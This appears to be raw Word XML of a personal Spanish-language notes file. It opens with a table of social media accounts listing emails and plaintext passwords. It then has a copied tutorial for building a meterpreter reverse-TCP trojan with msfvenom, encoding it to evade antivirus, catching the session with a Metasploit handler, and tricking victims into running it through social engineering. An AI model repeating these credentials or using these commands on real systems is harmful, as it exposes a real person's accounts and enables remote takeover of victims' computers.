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E07" w:rsidRDefault="006C2E07" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Mis datos personales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4"/>
        <w:gridCol w:w="1399"/>
        <w:gridCol w:w="1404"/>
        <w:gridCol w:w="3351"/>
        <w:gridCol w:w="2240"/>
      </w:tblGrid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N°</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1262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 w:rsidRPr="006C2E07">
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Pagina</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418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 w:rsidRPr="006C2E07">
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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Correo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312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Clave</w:t>
            </w:r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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1262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Facebook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418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 Borges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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Diegoborges514@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312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06092020</w:t>
            </w:r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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1262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Facebook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418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 Borges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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Borgesdiego816@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07" w:rsidRDefault="00CF4838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17314014</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1262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Instagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07" w:rsidRDefault="006C2E07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Alfonz_CS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340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 w:rsidRPr="00D7063A">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>diegoborges514@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="231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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="126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Instagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418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Clown_Saw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340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 w:rsidRPr="00D7063A">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>z.wark.mx@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="231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959931</w:t>
            </w:r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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="126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Twitter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418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alfonzcs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340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Diegoborges514@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="231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alfonzo1</w:t>
            </w:r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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1262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Twitter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07" w:rsidRDefault="00D7063A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Clown_Saw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07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8044F5" w:rsidTr="006C2E07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07" w:rsidRPr="006C2E07" w:rsidRDefault="006C2E07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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1262" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07" w:rsidRDefault="008044F5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BDVenezuela</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07" w:rsidRDefault="008044F5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AlfonzoBR</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07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Diegoborges514@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C2E07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Daniela123.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008044F5" w:rsidTr="006C2E07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008044F5" w:rsidRDefault="008044F5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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1262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GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418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ClownSaw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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Diegoborges514@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312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Diegoborges1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008044F5" w:rsidTr="006C2E07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008044F5" w:rsidRDefault="008044F5" w:rsidP="006C2E07">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1262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GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418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AlfonzCS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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Xxxhack7xxx@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008044F5" w:rsidRDefault="008044F5" w:rsidP="006C2E0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Diegoborges1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C2E07" w:rsidRDefault="006C2E07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</w:p>
    <w:p w:rsidR="00AE55E1" w:rsidRDefault="00AE55E1" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lineas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> de comando</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE55E1" w:rsidRDefault="00AE55E1" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F528B5" w:rsidRPr="00F528B5" w:rsidRDefault="00F528B5" w:rsidP="00F528B5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36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Configuración del módem.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Este paso es muy importante cuando su objetivo es a través de Internet o WAN. Ignore este paso si su objetivo está en la misma red. Para "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hackear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" una PC a través de Internet significa que tiene que comunicarse en ambas direcciones. Para hacer esto, su enrutador/módem debería abrir un puerto de su máquina. Esto se llama reenvío de puertos. Por defecto, todos los puertos están cerrados por su enrutador/módem. Abra un navegador vaya a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url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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00F528B5">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>http://192.168.0.1</w:t>
        </w:r>
      </w:hyperlink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 Escriba su nombre de usuario y contraseña. Esto lo llevará a la configuración del enrutador. Vaya a Configuración avanzada o a firewall para encontrar el reenvío de puertos (Port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Forwarding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). Ahora haga clic en agregar nuevo establecer el puerto de inicio y final en 444 (ya que estamos usando el puerto 444 en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metasploit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). En el campo de dirección IP, debe escribir la IP interna de su máquina GNU/Linux y guardamos los ajustes. Si requiere parámetros especiales cómo Protocolo, usa UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F528B5" w:rsidRPr="00F528B5" w:rsidRDefault="00F528B5" w:rsidP="00F528B5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val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F528B5"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s-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Generación del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F528B5"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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>.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Para generar el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basta con ejecutar el siguiente comando en su consola GNU/Linux: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msfvenom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-p windows/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meterpreter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reverse_tcp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  --platform windows -a x86 -f exe LHOST=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192.168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.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0.6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LPORT=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444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-o </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F22C40"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
        </w:rPr>
        <w:t>$HOME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/trojan.exe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Si desea hacer que su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sea más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dificil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de detectar para los antivirus, puede </w:t>
      </w:r>
      <w:proofErr w:type="gram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usar</w:t>
      </w:r>
      <w:proofErr w:type="gram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por ejemplo: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msfvenom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-p windows/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meterpreter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reverse_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tcp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 -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e x86/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shikata_ga_nai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-b </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="5AB738"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
        </w:rPr>
        <w:t>'\x00'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i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10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--platform windows -a x86 -f exe LHOST=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192.168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.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0.6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LPORT=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444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-o /home/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sechacklabs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/Desktop/trojan.exe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Si deseas conocer más a fondo sobre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metasploit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sigue </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F528B5">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>este enlace</w:t>
        </w:r>
      </w:hyperlink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. Con eso, se habrá generado un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de nombre </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>trojan.exe </w:t>
      </w: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en tu directorio HOME.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F528B5" w:rsidRPr="00F528B5" w:rsidRDefault="00F528B5" w:rsidP="00F528B5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/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36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Interacción con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>.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Una vez generado el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realizaremos los siguientes pasos, cuando hayamos terminado debemos buscar la manera de que se ejecute en el sistema de la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victima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, para lograrlo puedes usar técnicas cómo ingeniería social. No se recomienda enviar el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tal cual, hay que camuflarlo, añadirle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encoders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entre otras cosas.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Abrimos la consola de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metasploit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s-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F22C40"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>sudo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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Usamos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Handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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s-CL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msf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&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6666EA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>use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multi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handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Configuramos el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Payload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msf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exploit(handler) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6666EA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
        </w:rPr>
        <w:t>set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PAYLOAD </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="9C9491"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
        </w:rPr>
        <w:t>windows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meterpreter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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="9C9491"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Configuramos el puerto local.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s-CL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msf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exploit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(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handler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) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6666EA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>set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LPORT </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="9C9491"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>444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Configuramos la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ip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local.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s-CL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msf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exploit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(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handler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) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="6666EA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>set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LHOST </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="9C9491"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>"Nuestra IP local"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Ejecutamos el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exploit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msf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exploit(handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F528B5" w:rsidRPr="00F528B5" w:rsidRDefault="00F528B5" w:rsidP="00F528B5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 w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t>ejecutado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r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Una vez que la víctima haya ejecutado nuestro archivo malicioso obtendremos una sesión de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meterpreter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cómo se puede ver a continuación.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msf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exploit(multi/handler) &gt; exploit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[*] Started reverse TCP handler on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192.168.0.6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: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444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[*] Sending stage (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179779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bytes) to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192.168.0.9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[*] Meterpreter session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opened (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192.168.0.6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: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444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-&gt;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192.168.0.9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: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50328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) at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2018-05-18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12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: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00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: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25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-0500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meterpreter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&gt; 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sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Computer     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DESKTOP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-2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MRF5DJ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OS           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Windows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10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(Build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17134</w:t>
      </w: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).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Architecture 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x64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System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Language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es_ES</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Domain       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WORKGROUP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</w:pPr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Logged On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>Users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</w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DF5320"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F528B5" w:rsidRPr="00F528B5" w:rsidRDefault="00F528B5" w:rsidP="00F528B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s-CL"/>
        </w:rPr>
      </w:pP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Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spell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  </w:t>
      </w:r>
      <w:proofErr w:type="gram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 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve"> x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A8A19F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C2421"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F528B5" w:rsidRPr="00F528B5" w:rsidRDefault="00F528B5" w:rsidP="00F528B5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s-CL"/>
        </w:rPr>
      </w:pPr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El proceso es sencillo, la parte complicada es hacer ejecutar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> en la máquina de la víctima, más adelante explicaremos las mejores técnicas para lograrlo e incluso cómo se puede lograr aprovechando vulnerabilidades cómo </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00F528B5">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>Microsoft Office DDEAUTO</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F528B5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE55E1" w:rsidRDefault="00AE55E1" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E3B3E" w:rsidRDefault="003E3B3E" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E3B3E" w:rsidRDefault="003E3B3E" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E3B3E" w:rsidRPr="003E3B3E" w:rsidRDefault="003E3B3E" w:rsidP="003E3B3E">
      <w:pPr>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="003E3B3E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="6E6E6E"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>Hackeando</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="003E3B3E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="6E6E6E"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t xml:space="preserve"> bases de datos con SQL INJECTION usando SQLMAP.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3B3E" w:rsidRPr="003E3B3E" w:rsidRDefault="003E3B3E" w:rsidP="003E3B3E">
      <w:pPr>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:tooltip="author profile" w:history="1">
        <w:r w:rsidRPr="003E3B3E">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="155780"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>Emanuel Sotomayor</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId9" w:tooltip="permanent link" w:history="1">
        <w:r w:rsidRPr="003E3B3E">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="155780"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>23:45:00</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="999999"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
